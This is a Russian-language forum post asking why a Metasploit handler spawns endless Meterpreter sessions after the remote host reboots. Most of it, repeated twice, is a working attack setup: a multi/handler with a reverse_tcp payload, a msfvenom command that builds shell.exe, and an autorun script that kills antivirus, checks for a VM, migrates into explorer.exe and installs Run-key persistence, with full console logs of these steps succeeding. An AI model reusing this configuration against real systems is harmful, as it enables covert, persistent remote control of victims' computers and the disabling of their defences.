InetTester
Green Team
День добрый,
Буду очень благодарен если кто то подскажет как решить данную проблемму.
имееться exploit/multi/handler на который успешно прилетают коннекты с удаленных систем
сервер:
use exploit/multi/handler
set AUTORUNSCRIPT multi_console_command -r /root/cmd.rc
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set VERBOSE true
set LHOST IP
set LPORT PORT
exploit -jz
скриптт:
run post/windows/manage/priv_migrate
run post/windows/manage/killav
run post/windows/gather/checkvm
run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1. LPORT=4444 -f exe > shell.exe
пример:
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.30:49177) at 2021
[*] Session ID 1 (192.168.1.67:4444 -> 192.168.1.30:49177) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2660) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 2888
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jKCAKnwOLUtsoQo
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jKCAKnwOLUtsoQo
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0704/USER-��_20210801.0704.rc
[*] Meterpreter session 2 opened (192.168.1.67:4444 -> 192.168.1.30:49178) at 2021-08
[*] Session ID 2 (192.168.1.67:4444 -> 192.168.1.30:49178) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2888) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 1036
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\lzgMPfLKEfgVUcz
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\lzgMPfLKEfgVUcz
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0711/USER-��_20210801.0711.rc
[*] Meterpreter session 3 opened (192.168.1.67:4444 -> 192.168.1.30:49179) at 2021-
[*] Session ID 3 (192.168.1.67:4444 -> 192.168.1.30:49179) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (1036) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 2828
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jrZXsGOVa
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jrZXsGOVa
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0717/USER-��_20210801.0717.rc
[*] Meterpreter session 4 opened (192.168.1.67:4444 -> 192.168.1.30:49180) at 2021-08-01 07:07:17 -0400
[*] Session ID 4 (192.168.1.67:4444 -> 192.168.1.30:49180) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2828) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
А теперь самое главное:
После ребута удаленного хоста он мне просто циклически начинает создавать кучу сессий(мне нужна всего одна, а он меня просто бомбит ими...) без остановки, не могу понять где и как это настраиваеться?
Буду очень благодарен если кто то подскажет как решить данную проблемму.
имееться exploit/multi/handler на который успешно прилетают коннекты с удаленных систем
сервер:
use exploit/multi/handler
set AUTORUNSCRIPT multi_console_command -r /root/cmd.rc
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set VERBOSE true
set LHOST IP
set LPORT PORT
exploit -jz
скриптт:
run post/windows/manage/priv_migrate
run post/windows/manage/killav
run post/windows/gather/checkvm
run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1. LPORT=4444 -f exe > shell.exe
пример:
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.30:49177) at 2021
[*] Session ID 1 (192.168.1.67:4444 -> 192.168.1.30:49177) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2660) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 2888
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jKCAKnwOLUtsoQo
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jKCAKnwOLUtsoQo
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0704/USER-��_20210801.0704.rc
[*] Meterpreter session 2 opened (192.168.1.67:4444 -> 192.168.1.30:49178) at 2021-08
[*] Session ID 2 (192.168.1.67:4444 -> 192.168.1.30:49178) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2888) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 1036
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\lzgMPfLKEfgVUcz
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\lzgMPfLKEfgVUcz
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0711/USER-��_20210801.0711.rc
[*] Meterpreter session 3 opened (192.168.1.67:4444 -> 192.168.1.30:49179) at 2021-
[*] Session ID 3 (192.168.1.67:4444 -> 192.168.1.30:49179) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (1036) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 2828
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jrZXsGOVa
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jrZXsGOVa
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0717/USER-��_20210801.0717.rc
[*] Meterpreter session 4 opened (192.168.1.67:4444 -> 192.168.1.30:49180) at 2021-08-01 07:07:17 -0400
[*] Session ID 4 (192.168.1.67:4444 -> 192.168.1.30:49180) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2828) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
А теперь самое главное:
После ребута удаленного хоста он мне просто циклически начинает создавать кучу сессий(мне нужна всего одна, а он меня просто бомбит ими...) без остановки, не могу понять где и как это настраиваеться?
